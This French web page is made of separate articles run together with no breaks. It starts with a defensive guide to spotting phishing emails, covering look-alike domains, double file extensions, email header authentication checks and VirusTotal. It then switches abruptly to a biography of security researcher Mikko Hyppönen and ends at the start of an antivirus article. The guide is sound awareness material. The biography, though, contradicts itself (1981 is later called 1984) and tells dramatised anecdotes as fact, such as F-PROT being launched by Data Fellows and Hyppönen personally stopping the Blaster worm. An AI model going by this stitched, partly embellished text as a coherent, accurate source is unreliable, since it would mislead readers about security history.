Les emails frauduleux sont aujourd’hui l’un des moyens les plus utilisés par les cybercriminels pour piéger leurs victimes. Derrière un message bien formulé peut se cacher une tentative de vol d’identifiants, d’injection de malware ou une arnaque visant à vous faire transférer de l’argent.
Ces attaques ne visent pas que les professionnels ou les “gros comptes” : tout le monde peut être ciblé, à partir d’une simple adresse email.
Dans cet article, vous allez apprendre à :
repérer les signes qui doivent vous alerter (adresse douteuse, lien suspect, pièce jointe piégée, etc.),
vérifier techniquement un email (affichage complet, en-têtes, liens masqués),
et surtout quoi faire en cas de doute, sans tomber dans le piège.
Ces bonnes pratiques s’appliquent aussi bien dans un cadre personnel que professionnel, et permettent de réduire considérablement les risques d’attaque.
Les signes qui doivent vous alerter
Tous les emails frauduleux ne sont pas évidents à repérer. Certains sont grossiers, d’autres très bien construits et capables de tromper même des utilisateurs expérimentés. Voici les principaux éléments à vérifier pour détecter un email potentiellement dangereux :
Une adresse d’expéditeur suspecte ou usurpée
L’un des premiers éléments à vérifier est l’adresse email réelle de l’expéditeur — pas uniquement le nom affiché. Il est facile d’écrire “Amazon Service” ou “Support Impôts” dans l’en-tête d’un mail, mais l’adresse qui se cache derrière en dit souvent long.
Les cybercriminels utilisent souvent des adresses qui ressemblent fortement à des adresses officielles, en jouant sur des variantes :
utilisation d’un nom de domaine proche : @service-amazon.com, @orange-client.fr
ajout ou suppression de lettres, tirets ou sous-domaines : @gouvfr.com, @amendes-info.fr, @xxx-gouv.fr
Cette technique s’appelle le typosquatting : elle consiste à enregistrer des noms de domaines qui imitent de vrais domaines (officiels ou connus) pour tromper les victimes.
Exemple réel : des campagnes de phishing ou de SMS frauduleux prétendant provenir de l’ANTAI (Agence nationale de traitement automatisé des infractions) ont utilisé des domaines comme paiement-amendes-gouvfr.com ou antai-securite.info. À lire : Arnaque au retard d’amende non payé (phishing)
Un objet ou un contenu trop vague, alarmant ou tentant
Un email frauduleux utilise souvent un ton urgent ou menaçant : “Votre compte sera suspendu”, “Dernier avis avant suppression”, ou “Vous avez gagné un iPhone”. Parfois, le message reste vague, impersonnel ou vous pousse à cliquer sans explication. Le but est simple : vous faire réagir vite, sans réfléchir.
Vérifier les liens reçus
Avant de cliquer sur un lien, prenez le temps de survoler l’adresse (sans cliquer). Lien affiché et destination réelle peuvent ne pas correspondre. Il arrive aussi que des URL soient raccourcies (bit.ly, tinyurl) ou hébergées sur des domaines obscurs. Si l’adresse semble incohérente ou inconnue, évitez d’y accéder.
Pièces jointes inattendues
Les pièces jointes sont l’un des moyens les plus courants pour diffuser des malwares. Les fichiers dangereux les plus utilisés sont les .exe, .js, .vbs, .scr, ou encore certains documents Office piégés comme les .docm (Word avec macro active).
Mais pour éviter d’être détectés par les antivirus ou éveiller les soupçons, ces fichiers malveillants sont souvent dissimulés dans une archive compressée de type .zip ou .rar. L’internaute pense ouvrir une pièce jointe banale, mais c’est à l’intérieur que se cache le vrai danger.
L’astuce de la double extension :
Une autre méthode courante consiste à utiliser une double extension. Par exemple, un fichier malveillant peut être nommé facture.pdf.exe ou photo.jpg.scr. Sur Windows, si les extensions sont masquées (ce qui est le cas par défaut), l’utilisateur ne verra que “facture.pdf” — et pensera à tort qu’il s’agit d’un document.
Voici un exemple où un fichier ZIP de facture, semble être un fichier PDF, mais regardez la colonne Type.
L’attaquant a même pris le soin d’ajouter des espaces pour véritablement cacher l’extension si la colonne est trop petite.
Si vous n’attendez pas de pièce jointe, même venant d’un contact connu, ne l’ouvrez jamais sans vérification préalable. Et surtout :
n’activez pas les macros dans un document Office,
passez toujours le fichier dans un outil comme VirusTotal.
Analyser le style du message
Enfin, le style d’écriture peut trahir l’arnaque. Un texte truffé de fautes, des tournures maladroites, des logos pixelisés ou une signature inhabituelle sont autant d’indices. Les messages sont parfois mal traduits ou générés automatiquement, ce qui les rend faciles à repérer avec un peu d’attention.
Vérifier techniquement un email
Lorsque le contenu d’un email vous semble suspect, il est utile d’aller plus loin que la simple lecture. Quelques vérifications techniques simples permettent de mieux comprendre si un message est frauduleux, sans nécessiter de compétences avancées.
Afficher l’adresse complète de l’expéditeur
Dans de nombreux clients email, seul le nom de l’expéditeur est visible par défaut. Il est important d’afficher l’adresse réelle pour vérifier qu’elle correspond bien à l’entreprise ou au contact supposé. Par exemple, un message affiché comme « Amazon Support » peut en réalité venir de [email protected].
Sur Outlook, Gmail, Thunderbird ou sur smartphone, il est généralement possible d’appuyer ou de cliquer sur le nom pour voir l’adresse complète.
Survoler les liens sans cliquer
Un lien peut sembler légitime, mais rediriger vers un site piégé. Avant de cliquer, survolez le lien avec votre souris : l’adresse réelle s’affiche en bas du navigateur ou du client mail. Si elle vous paraît étrange, avec des fautes, des sous-domaines farfelus ou un nom de domaine inconnu, ne cliquez pas.
Examiner l’en-tête de l’email (header)
Chaque email contient des informations techniques appelées en-têtes (headers), qui permettent de retracer son parcours depuis l’expéditeur jusqu’à votre boîte mail. On y trouve notamment :
l’adresse IP d’envoi,
les serveurs utilisés pour la transmission,
et des indicateurs de sécurité comme SPF, DKIM et DMARC, qui permettent de vérifier si l’expéditeur est bien autorisé à envoyer des mails depuis ce domaine.
Ces technologies ne sont pas toujours visibles à l’utilisateur final, mais les clients mail avancés ou certains outils d’analyse permettent de les inspecter. Voici ce qu’elles signifient :
SPF (Sender Policy Framework) : vérifie si l’IP d’envoi est autorisée à envoyer des mails au nom du domaine utilisé.
DKIM (DomainKeys Identified Mail) : ajoute une signature cryptographique pour authentifier le contenu du message.
DMARC (Domain-based Message Authentication, Reporting and Conformance) : définit comment réagir (accepter, mettre en spam, rejeter) si SPF ou DKIM échoue.
Si l’un ou plusieurs de ces mécanismes échouent, cela peut indiquer un spoofing ou une tentative d’usurpation de domaine.
En général, le Webmail ou le client mail propose une option « Afficher l’original » ou « Afficher l’en-tête« . Par exemple, lorsque dmarc échoue, on obtient la mention « dmarc=fail« .
Notez que certains webmail peuvent faire l’effort d’afficher cette information. Par exemple, ci-dessous, ce mail d’arnaque tente d’envoyer un mail d’erreur et de notice se faisant passer pour @malekal.com (spoofing). Protonmail indique que l’adresse email de l’expéditeur ne répond pas aux exigences d’authentification du domaine.
L’analyse complète des headers demande un certain niveau technique. Elle est donc plutôt réservée aux utilisateurs avancés, aux administrateurs ou aux analystes en sécurité. Mais, des outils en ligne peuvent vous aider à les décrypter facilement, comme :
Si vous avez un doute sur un fichier ou un lien, vous pouvez le tester sans risque sur un site spécialisé comme VirusTotal. Ce service analyse le contenu avec plusieurs antivirus simultanément, sans l’ouvrir sur votre machine. Vous pouvez y uploader une pièce jointe ou coller un lien suspect pour voir s’il est reconnu comme dangereux.
Recevoir un email suspect n’est pas rare. Mais ce n’est pas parce qu’un message semble étrange qu’il faut paniquer — ni cliquer pour en avoir le cœur net. Voici les bons réflexes à adopter dès que vous avez le moindre doute.
Ne cliquez ni sur les liens, ni sur les pièces jointes. Même un simple clic sur un lien peut suffire à vous rediriger vers un site piégé ou lancer un téléchargement automatique.
Évitez de répondre, même pour dire “je ne suis pas intéressé” ou “est-ce une arnaque ?”. Cela confirme au pirate que votre adresse est active, et peut vous exposer à d’autres attaques.
Prenez une minute pour relire l’email à froid. Est-ce qu’il contient des fautes ? Une adresse étrange ? Est-ce que le ton est anormalement urgent ? Est-ce une demande logique dans le contexte (par exemple, une facture d’un service que vous n’utilisez pas) ?
Vérifiez par un autre canal : Si l’email semble provenir d’une personne ou d’un service que vous connaissez, contactez-les directement par un autre moyen (téléphone, SMS, site officiel, etc.) pour confirmer qu’ils vous ont bien envoyé ce message.
Signalez le message. Si vous avez identifié un email frauduleux, vous pouvez :
le signaler comme spam/phishing dans votre boîte mail,
Enfin, une fois le doute levé, supprimez le message de votre boîte. Vous pouvez aussi vider la corbeille pour éviter de le rouvrir accidentellement plus tard.
Un email douteux ne doit jamais être traité dans la précipitation. Le meilleur réflexe est souvent d’attendre, de prendre du recul, ou de demander un second avis.
Tableau – Les 5 vérifications à faire sur un email suspect
Vérification
Ce qu’il faut observer
À éviter / À faire
Adresse de l’expéditeur
Est-ce un domaine légitime ? (@gouv.fr, @edf.fr)
Méfiez-vous des adresses ressemblantes : @orange-client.fr
Ton du message
Urgence, menace, récompense, relance agressive
Ne vous laissez pas presser. Prenez le temps de réfléchir.
Liens dans le message
Lien visible = lien réel ? Survolez pour vérifier
Ne cliquez pas si l’adresse est étrange ou raccourcie (bit.ly, etc.)
Fautes, traduction automatique, logo flou, format étrange
Un message mal écrit est un bon signal d’alerte
Un seul de ces signes peut suffire à éveiller un doute. Plusieurs combinés, c’est presque sûr : il s’agit d’un email frauduleux. Si vous avez un doute : ne cliquez pas, ne répondez pas, et faites vérifier le message sur un outil comme VirusTotal.
Comment protéger son PC des virus par E-mail
Pour aller plus loin, voici un guide pour vous protéger concrètement contre ce type de menaces informatiques. Vous y découvrirez :
les méthodes utilisées pour piéger les internautes par email,
les techniques de dissimulation des virus (ZIP, .js, macros…),
et les bons réflexes à adopter pour ne pas tomber dans le piège.
Si vous avez bien suivi mes articles de ces dernières semaines, vous devez savoir que le monde de la cybersécurité regorge de personnages fascinants. Mais aujourd’hui, installez-vous confortablement parce que je vais vous raconter l’histoire d’un mec qui est plus que ça ! Il est carrement légendaire car Mikko Hyppönen, c’est le Sherlock Holmes des virus informatiques, car au lieu de résoudre des meurtres dans le Londres victorien, il traque les malwares dans le cyberespace depuis plus de 30 ans et son parcours est incroyable !
La première fois que j’ai vraiment pris conscience de l’importance de Mikko sur la Scene, c’était quand il a formulé sa fameuse “Loi de Hyppönen” en décembre 2016 qui dit que : “Dès qu’un appareil est décrit comme étant ‘intelligent’, il est vulnérable.” Cette petite phrase, tweetée un matin depuis Helsinki, est devenue l’une des règles les plus citées de la cybersécurité moderne. Mais l’histoire de ce Finlandais extraordinaire commence bien avant cela, dans un monde où les virus se propageaient encore sur des disquettes 5,25 pouces et où Internet n’était qu’un rêve de geeks.
Mikko Hyppönen, le chercheur en sécurité finlandais qui traque les malwares depuis 1991
Mikko Hermanni Hyppönen naît le 13 octobre 1969 à Kyrkslätt, en Finlande, dans un pays qui va devenir l’un des berceaux de la révolution numérique mondiale avec Nokia, Linux et… Angry Birds ^^. Et son histoire avec l’informatique commence très tôt, puisque sa mère, Kristina, née en 1935, travaille déjà avec des ordinateurs depuis 1966 ! À une époque où la plupart des gens pensent qu’un ordinateur c’est un truc de science-fiction, la maman de Mikko programme sur des machines IBM System/360 grosses comme des frigos.
Du coup, dans les années 70, pendant que les autres gamins jouent aux billes, le petit Mikko et ses deux frères s’amusent avec des cartes perforées et des bandes perforées que leur maman rapporte du boulot. “C’était notre Lego à nous”, racontera-t-il plus tard. Les trous dans les cartes formaient des patterns binaires, et les gamins s’amusaient à créer des motifs, sans vraiment comprendre qu’ils manipulaient les ancêtres du code moderne.
En 1981, à 12 ans, Mikko programme déjà sur un Sinclair ZX81 avec son énorme 1 Ko de RAM. Je sais, aujourd’hui, une simple emoji prend plus de place, mais en 1984, c’était foufou. Et un jour, il obtient son premier vrai ordinateur personnel, un Commodore 64. La bête a 64 Ko de RAM, un processeur 6510 à 1 MHz, et surtout, une communauté mondiale de passionnés qui échangent des programmes sur cassettes audio.
Le Commodore 64, premier ordinateur de Mikko et point de départ de sa carrière
Et là, c’est parti pour une passion qui ne le quittera plus jamais. Le gamin ne se contente pas de jouer à “International Karate” ou “The Last Ninja”. Il apprend le BASIC, puis l’assembleur 6502, le langage le plus proche de la machine. À 15 ans, il code déjà des démos et des utilitaires qu’il échange dans la scène underground finlandaise. Il fait même partie de plusieurs groupes de demo-makers, cette culture unique où les programmeurs rivalisent pour créer les effets visuels les plus impressionnants avec le minimum de ressources.
Et à 16 ans, moment charnière. Sa mère l’assoit à la table de la cuisine pour une discussion sérieuse. “Mikko, écoute-moi bien. Étudie les télécommunications, les télécommunications c’est l’avenir !” Elle a vu arriver les modems, les BBS (Bulletin Board Systems), les premiers réseaux. Visionnaire, cette femme ! Mikko l’écoute et s’inscrit en informatique avec une spécialisation télécom à l’Université de technologie d’Helsinki.
Et pendant ses études, Mikko ne chôme pas. Il code, il hacke (légalement !), il explore. Et il devient même modérateur sur plusieurs BBS finlandais, ces ancêtres d’Internet où les geeks se connectent via modem pour échanger des fichiers et discuter. C’est là qu’il commence à voir apparaître les premiers virus. Des trucs basiques qui affichent des messages ou effacent des fichiers. Fasciné, il les décompile, les analyse, comprend leur fonctionnement.
Puis en 1991, alors qu’il est encore étudiant, Mikko tombe sur une annonce qui va changer sa vie. Data Fellows, une petite startup finlandaise fondée en 1988 par Petri Allas et Risto Siilasmaa, cherche des programmeurs. L’entreprise développe des outils de sécurité et de chiffrement pour les entreprises. Mikko postule, passe l’entretien, et décroche le job. Il devient employé numéro… 30 et quelques. L’entreprise est minuscule, mais ambitieuse.
Data Fellows qui deviendra F-Secure, où Mikko a passé 34 ans de sa carrière
À l’époque, l’industrie antivirus en est à ses balbutiements. Les grands noms sont McAfee, Norton, et quelques autres américains. En Europe, y’a pas grand monde. Les virus se propagent principalement via des disquettes échangées de main en main. Internet existe, mais c’est encore un truc d’universités et de militaires et le World Wide Web ne sera disponible qu’en 1993. Mikko commence par analyser des virus DOS simples, mais il comprend vite qu’on est à l’aube d’une révolution.
Ce qui rend Mikko unique dès le début, c’est sa capacité à comprendre que derrière chaque virus, y’a une histoire humaine. Les créateurs de virus ne sont pas des monstres, ce sont souvent des gamins qui veulent prouver leurs compétences ou des programmeurs frustrés. Cette approche humaniste va définir toute sa carrière.
En 1994, Data Fellows lance F-PROT, l’un des premiers antivirus commerciaux européens. Mikko devient rapidement LE spécialiste des nouvelles menaces. Il développe une méthode d’analyse unique : Au lieu de juste créer des signatures pour détecter les virus connus, il cherche à comprendre les techniques utilisées, les motivations des créateurs, l’évolution des menaces. C’est de la criminologie appliquée au code.
1999, l’entreprise change de nom et devient F-Secure. Elle entre en bourse à Helsinki. Mikko, qui avait reçu des stock-options, devient millionnaire du jour au lendemain, mais contrairement à beaucoup qui auraient pris l’argent et seraient partis faire du kitesurf aux Maldives, Mikko reste. Pourquoi ? “J’adore mon boulot. Chaque jour apporte de nouveaux défis, de nouvelles menaces à analyser. C’est comme être détective, mais dans le cyberespace.”
L’un des moments les plus marquants de sa carrière arrive ensuite en 2011. Pour célébrer le 25e anniversaire du premier virus PC, Mikko décide de faire quelque chose de complètement fou : retrouver les créateurs du virus “Brain”, le tout premier virus PC de l’histoire. Problème : tout ce qu’il a, c’est le code du virus avec une adresse à Lahore, au Pakistan. Une adresse vieille de 25 ans dans une ville de 11 millions d’habitants.
Code source du virus Brain qui se propageait via des disquettes 5,25 pouces
Mais Mikko n’est pas du genre à abandonner. Il prend l’avion pour Lahore avec une équipe de tournage. L’adresse dans le code du virus indique “Brain Computer Services, 730 Nizam Block, Allama Iqbal Town” et arrivé sur place, miracle, le magasin existe toujours ! Et les créateurs du virus, Basit et Amjad Farooq Alvi, deux frères maintenant quinquagénaires à ce moment là, y travaillent encore !
La rencontre est surréaliste. Les frères Alvi accueillent Mikko chaleureusement. Ils expliquent qu’en 1986, ils vendaient des logiciels médicaux pour les hôpitaux pakistanais. Problème, leurs clients pirataient systématiquement leurs programmes donc pour les protéger, ils ont créé Brain, qui infectait les disquettes pirates. Le virus affichait un message demandant aux utilisateurs de les contacter pour obtenir une version légale. Ils avaient même mis leurs vrais noms, numéros de téléphone et adresse dans le code !
“Nous n’avions aucune intention malveillante”, explique Basit dans le documentaire. “Nous voulions juste protéger notre travail. Nous n’imaginions pas que ça deviendrait mondial.” Entre 1986 et 1989, Brain infectera plus de 100 000 ordinateurs de l’Arabie Saoudite à l’Indonésie. Les frères recevaient des appels furieux du monde entier, ne comprenant pas comment leur petit programme de protection avait pu voyager si loin.
Le documentaire de 10 minutes que Mikko réalise devient viral (sans mauvais jeu de mots). C’est la première fois que les créateurs du premier virus PC racontent leur histoire. On y voit les frères, maintenant chefs d’une entreprise d’hébergement web prospère, expliquer avec émotion qu’ils sont horrifiés par ce qu’est devenue l’industrie du malware. “Aujourd’hui, les virus sont créés pour voler, détruire, faire du chantage. C’est terrible”, déplore Amjad.
Mais bon, le vrai coup de maître de Mikko dans sa carrière, c’est son travail sur les virus les plus destructeurs de l’histoire moderne.
Retournons maintenant un peu en arrière… en 2003, c’est l’apocalypse numérique car en l’espace de quelques semaines, trois vers dévastateurs frappent Internet : Slammer en janvier, Blaster en août, et Sobig.F peu après. Des millions de machines infectées, des milliards de dollars de dégâts, et Internet qui ralentit au point de devenir inutilisable par moments.
F-Secure, sous la direction de Mikko, est en première ligne. L’équipe travaille 24h/24 pour analyser les menaces et développer des contre-mesures. Pour Blaster, Mikko et son équipe réalisent un exploit extraordinaire. Le ver exploite une faille dans Windows XP pour se propager automatiquement et en analysant le code, ils découvrent que le ver télécharge ses instructions depuis un serveur spécifique. Mikko contacte les autorités, le serveur est saisi, et le ver est neutralisé en quelques jours.
Pour Sobig.F, c’est encore plus épique puisque ce ver envoie des millions de spams et tente de télécharger du code malveillant depuis 20 serveurs différents. Mikko se coordonne avec le FBI, Interpol et des équipes de sécurité du monde entier et un par un, les 20 serveurs sont identifiés et neutralisés AVANT l’heure d’activation du ver. Une opération internationale coordonnée pour stopper une cybermenace, c’est du jamais vu à l’époque !
Puis en 2004, Vanity Fair publie un article de 10 pages intitulé “The Code Warrior” qui raconte cette période héroïque. Mikko y est présenté comme l’un des héros méconnus de la guerre contre les cybercriminels. L’article décrit ses nuits blanches, ses coups de téléphone avec le FBI à 3h du matin, sa course contre la montre pour sauver Internet. C’est une reconnaissance mainstream pour ce Finlandais discret qui préfère l’ombre des labos aux projecteurs.
Mais entre nous, l’une des affaires les plus fascinantes de sa carrière, c’est son analyse de Stuxnet en 2010. Ce ver informatique d’une complexité jamais vue est découvert par hasard par une petite boîte de sécurité biélorusse, mais c’est Mikko et quelques autres experts mondiaux qui vont comprendre sa véritable nature. Car Stuxnet ne vole pas de données, ne demande pas de rançon… Il cherche spécifiquement des automates programmables Siemens utilisés dans les centrifugeuses d’enrichissement d’uranium.
Stuxnet, le premier cyber-weapon d’État analysé par Mikko et son équipe
L’analyse de Mikko est glaçante : Stuxnet est une arme. Une cyber-arme développée par un ou plusieurs États pour saboter physiquement le programme nucléaire iranien. Le ver fait tourner les centrifugeuses trop vite puis trop lentement, les détruisant progressivement tout en envoyant de fausses données aux opérateurs. “C’est le premier acte de cyber-guerre de l’histoire”, déclare Mikko. “On est passé du vandalisme numérique à la destruction physique via le code.”
Mikko donne des briefings classifiés aux gouvernements européens sur Stuxnet et leur explique que la boîte de Pandore est ouverte : si on peut détruire des centrifugeuses avec du code, on peut aussi s’attaquer aux centrales électriques, aux barrages, aux systèmes de transport. La cyber-guerre n’est plus de la science-fiction.
L’ironie de l’histoire arrive en 2012 lorsque l’Organisation Iranienne de l’Énergie Atomique envoie directement un email à Mikko : “Monsieur Hyppönen, nous avons découvert un nouveau malware dans nos systèmes. Pouvez-vous nous aider à l’analyser ?” Imaginez, les Iraniens, victimes de Stuxnet, qui contactent un expert finlandais pour les aider ! C’est dire le niveau de respect et de neutralité que Mikko s’est construit. Il analyse alors le malware (baptisé Flame) et publie ses résultats publiquement, sans prendre parti.
Puis en juin 2013, Edward Snowden balance les documents de la NSA et le monde découvre l’ampleur de la surveillance de masse. PRISM, XKeyscore, la collecte systématique des métadonnées… C’est un séisme. Mikko, qui avait déjà des soupçons, devient l’une des voix les plus critiques et les plus écoutées sur le sujet.
Son TED Talk de décembre 2013, “How the NSA betrayed the world’s trust – time to act”, devient viral avec plus de 2 millions de vues. Mikko y explique quelque chose de terrifiant avec son calme finlandais habituel : “Si vous n’êtes pas citoyen américain, vous n’avez aucun droit. La NSA peut légalement espionner tous vos emails, toutes vos communications, juste parce que vous n’êtes pas américain.”
Il pose surtout LA question qui dérange : “Faisons-nous aveuglément confiance à n’importe quel gouvernement futur ? Parce que tout droit que nous abandonnons, nous l’abandonnons pour de bon. Si nous acceptons la surveillance aujourd’hui parce que nous faisons confiance à Obama, qu’est-ce qui se passe si dans 20 ans c’est un dictateur qui a accès à ces outils ?”
Son autre TED Talk, “Three types of online attack”, donné en 2012 et visionné 1,5 million de fois, est aussi devenu une masterclass pour comprendre les menaces numériques. Mikko y explique qu’il existe trois types d’attaques en ligne : les criminels (qui veulent votre argent), les hacktivistes (qui veulent faire passer un message), et les gouvernements (qui veulent tout savoir). Mais seuls les deux premiers sont considérés comme des crimes. Le troisième ? C’est légal. “C’est ça le problème”, martèle Mikko.
Mais ce qui rend Mikko vraiment spécial, au-delà de ses analyses techniques pointues, c’est sa capacité à anticiper les tendances. En 2014, alors que tout le monde s’extasie devant les objets connectés, Mikko tire la sonnette d’alarme. “On est en train de transformer chaque objet en ordinateur. Votre frigo devient un ordinateur qui refroidit. Votre voiture devient un ordinateur qui roule. Votre montre devient un ordinateur que vous portez. Et qui dit ordinateur dit vulnérabilités.”
Enfin, en décembre 2016, il tweet ce qui deviendra sa phrase la plus célèbre : “Dès qu’un appareil est décrit comme étant ‘intelligent’, il est vulnérable”.
La Loi de Hyppönen est née. Simple, percutante, terriblement vraie. Votre smart TV ? Vulnérable. Votre thermostat intelligent ? Vulnérable. Votre sex-toy connecté ? Vulnérable (et oui, ça existe, et oui, ça a déjà été hacké).
L’analogie qu’il utilise aussi pour expliquer les risques est brillante. En 2017, lors d’une conférence à Helsinki, il déclare : “Les objets connectés d’aujourd’hui, c’est l’amiante des années 60-70. À l’époque, on mettait de l’amiante partout parce que c’était un super isolant. 30 ans plus tard, on a découvert que ça tuait les gens. Aujourd’hui, on connecte tout à Internet parce que c’est cool. Dans 20 ans, on se demandera comment on a pu être aussi inconscients.”
Et il a raison ! Les honeypots de F-Secure (des pièges pour détecter les attaques) montrent une explosion des infections IoT. En 2016, le botnet Mirai, composé de caméras de sécurité et de routeurs compromis, lance la plus grosse attaque DDoS de l’histoire, mettant hors ligne une partie d’Internet pendant des heures. “Je l’avais prédit”, dit simplement Mikko. Pas par arrogance, mais avec la tristesse de Cassandre qui voit ses prophéties se réaliser.
En 2018, Mikko co-écrit avec Linus Nyman un papier académique : “The Internet of (Vulnerable) Things: On Hypponen’s Law, Security Engineering, and IoT Legislation”. L’article devient une référence, cité dans les propositions de loi en Californie, au Royaume-Uni, en Europe. Pour la première fois, des gouvernements comprennent qu’il faut réguler la sécurité des objets connectés AVANT la catastrophe, pas après.
2021 marque un tournant car après 30 ans à analyser des malwares, Mikko décide de partager sa vision globale. Il écrit le livre “If It’s Smart, It’s Vulnerable” (lien affilié), publié d’abord en finnois puis traduit en anglais, allemand, japonais. Le livre n’est pas un manuel technique, c’est une réflexion philosophique sur notre rapport à la technologie dans laquelles Mikko développe sa vision : Après la révolution Internet qui a mis tous les ordinateurs en ligne, la révolution IoT met “tout le reste” en ligne.
“If It’s Smart, It’s Vulnerable” - Le livre de Mikko sur l’avenir de la cybersécurité
Sa prédiction finale y est vertigineuse : “À terme, tout ce qui consomme de l’électricité sera en ligne”. Votre ampoule, votre grille-pain, votre brosse à dents. Et quand être hors ligne ne sera plus une option, Internet deviendra tellement omniprésent qu’on ne le remarquera même plus. Comme l’électricité aujourd’hui : vous ne pensez pas “je vais utiliser l’électricité” quand vous allumez la lumière.
Une des caractéristiques les plus fascinantes de Mikko, c’est son côté archiviste obsessionnel. Depuis 1994, il garde TOUS ses emails. En 2024, ça représente 6,8 millions de messages, 150 Go de données. “C’est mon journal intime numérique”, explique-t-il. “Je peux retrouver exactement ce que je faisais n’importe quel jour depuis 30 ans”. Cette habitude reflète sa compréhension profonde de l’importance de la mémoire numérique.
Mikko est aussi un orateur extraordinaire. Il a donné des keynotes dans toutes les conférences qui comptent : Black Hat (Las Vegas, la Mecque du hacking), DEF CON (la conférence underground par excellence), RSA (le rendez-vous corporate de la cybersécurité), TED, TEDx, SXSW, DLD, Slush, même les Assises de la Sécurité à Monaco où je l’avais croisé IRL… Et sa présence sur scène est magnétique : costume impeccable, accent finlandais charmant, slides minimalistes mais percutants.
Ce qui frappe surtout dans ses présentations, c’est sa capacité à rendre accessible le plus complexe. Quand il explique un buffer overflow, même votre chef comprend. Quand il parle de cryptographie quantique, on a l’impression que c’est simple. Il a le don rare de vulgariser sans simplifier et d’éduquer sans ennuyer.
Et comme vous le savez, son travail ne se limite pas aux conférences car depuis les années 90, Mikko assiste régulièrement les forces de l’ordre. FBI, Europol, Interpol… Quand une affaire de cybercriminalité dépasse les compétences locales, on appelle Mikko. Il a témoigné dans des dizaines de procès, aidé à coincer des cybercriminels du Brésil à la Russie. Mais toujours discrètement : “Je ne suis pas un flic, je suis un expert technique. Mon job c’est d’expliquer comment le crime a été commis, pas de menotter les méchants.”
Depuis 2007, il siège au conseil consultatif d’IMPACT (International Multilateral Partnership Against Cyber Threats) aux côtés de pointures comme Yevgeny Kaspersky (oui, LE Kaspersky de l’antivirus), Hamadoun Touré (ex-secrétaire général de l’ITU), et d’autres. En 2016, il devient aussi conservateur du Malware Museum aux Internet Archives, préservant l’histoire des virus pour les générations futures.
Et la reconnaissance internationale pleut sur Mikko. PC World le classe parmi les 50 personnes les plus importantes du web. Foreign Policy l’inclut dans sa liste Global 100 Thinkers. Il est intronisé au Temple de la renommée d’Infosecurity Europe en 2016. Twitter le remercie publiquement pour avoir amélioré leur sécurité. Même Wired, le magazine tech le plus influent du monde, lui demande d’écrire régulièrement.
Mais Mikko reste profondément finlandais et comme tous les hommes de son pays, il a fait son service militaire obligatoire. Mais au lieu de rentrer chez lui après, il est resté dans la réserve et aujourd’hui, il est capitaine dans la division des transmissions de l’armée finlandaise. “La Finlande a 1 340 km de frontière avec la Russie”, rappelle-t-il. “La défense nationale, c’est l’affaire de tous.” Cette formation militaire transparaît également dans son approche : discipline, méthode, anticipation.
D’ailleurs, malgré des offres mirobolantes de la Silicon Valley, de Londres, de Singapour, Mikko refuse de quitter la Finlande. “J’aime mon pays. Les hivers sont longs et sombres, mais les étés sont magiques. Et puis, la Finlande est régulièrement classée pays le plus heureux du monde. Pourquoi partir ?” Il vit toujours près d’Helsinki avec sa femme et ses trois fils, dans une maison qu’il a truffée de gadgets IoT… tous sécurisés, évidemment.
En 2022, grosse surprise dans l’industrie. F-Secure se scinde en deux : F-Secure pour les particuliers, WithSecure pour les entreprises. Mikko reste donc avec WithSecure comme Chief Research Officer mais après 34 ans dans la même boîte (un record dans la tech !), l’envie de changement le titille.
Puis en juin 2025, coup de tonnerre !! Mikko annonce qu’il quitte WithSecure pour rejoindre Sensofusion, une startup finlandaise spécialisée dans… les technologies anti-drones.
Comment ça ??? Le monsieur anti-virus devient monsieur anti-drone ? L’industrie est sous le choc. Mais quand on y réfléchit, c’est logique car les drones autonomes armés utilisant l’IA représentent la prochaine grande menace. Un drone peut porter des explosifs, des armes biologiques, peut espionner, peut former des essaims coordonnés… Comme l’explique Mikko, “Les malwares détruisent des données. Les drones peuvent détruire des vies […] et avec l’IA, la miniaturisation, le coût qui baisse, n’importe qui pourra bientôt acheter un drone tueur sur le dark web. Il faut développer des contre-mesures MAINTENANT”. Bref, toujours cette capacité à voir 5 ans en avance.
Les drones autonomes : la nouvelle frontière de la sécurité selon Mikko
Quand on lui demande d’identifier les grandes menaces de 2024-2025, Mikko liste cinq dangers majeurs avec sa clarté habituelle.
1/ la désinformation amplifiée par l’IA. “Bientôt, créer de fausses vidéos parfaites sera aussi simple qu’écrire un tweet.”
2/ les deepfakes utilisés pour le chantage ou la manipulation.
3/ l’automatisation des cyberattaques. “L’IA peut tester des millions de combinaisons par seconde, trouver des failles que les humains rateraient.”
4/ la manipulation psychologique personnalisée. “Une IA qui a lu tous vos posts peut créer le message parfait pour vous manipuler.”
5/ la perte de contrôle sur les systèmes autonomes. “Que se passe-t-il quand l’IA qui gère le réseau électrique décide qu’elle sait mieux que nous ?”
Bref, l’approche de Mikko a toujours été holistique car il ne se contente pas d’analyser le code… il comprend le contexte géopolitique, les motivations humaines, l’impact sociétal. Par exemple, quand il parle de Stuxnet, il explique les tensions Iran-Israël. Quand il analyse un ransomware, il est capable de décrire l’économie criminelle russe. Cette vision à 360 degrés fait donc de lui l’un des experts les plus complets au monde.
Aujourd’hui, l’héritage de Mikko est partout. Quand votre antivirus détecte une menace, il utilise des techniques qu’il a développées. Quand votre smartphone vous alerte sur une app suspecte, c’est grâce à des recherches qu’il a menées. Quand l’Europe vote des lois sur la sécurité IoT, c’est en citant ses travaux. Et quand les médias parlent de cyberguerre, ils reprennent ses analyses !
Mais au-delà des accomplissements techniques, Mikko représente quelque chose de plus grand. Dans un monde où la tech évolue à vitesse grand V, où les menaces se multiplient, où la frontière entre physique et numérique s’efface, on a besoin de gardiens, c’est à dire de gens qui comprennent la technologie mais gardent leur humanité… des experts qui alertent sans faire peur, des visionnaires qui anticipent sans fantasmer.
Et dans 20 ans, quand l’IA sera partout, quand les drones patrouilleront dans nos villes, et quand le moindre objet sera connecté, on se souviendra de Mikko comme celui qui avait prévenu. Celui qui avait vu venir. Celui qui s’est battu pour que la technologie reste au service de l’humanité.
On croit souvent qu’installer un antivirus suffit à protéger son PC. En réalité, la sécurité informatique ne dépend pas uniquement d’un logiciel, mais avant tout de vos comportements et de votre vigilance.
Les cybercriminels ne ciblent pas seulement les failles techniques, mais exploitent surtout les erreurs humaines : téléchargements de cracks, clics sur des liens douteux, logiciels non à jour, programmes installés sans attention…
Dans cet article, vous découvrirez les véritables causes d’infection, les profils les plus exposés, et surtout, les bonnes pratiques à adopter pour sécuriser efficacement votre ordinateur au quotidien — bien au-delà de l’antivirus.
Introduction : la sécurité, ce n’est pas (que) l’antivirus
Quand on parle de sécurité informatique, beaucoup pensent qu’il suffit d’installer un antivirus pour être protégé. C’est une idée reçue largement répandue… et pourtant, loin de suffire.
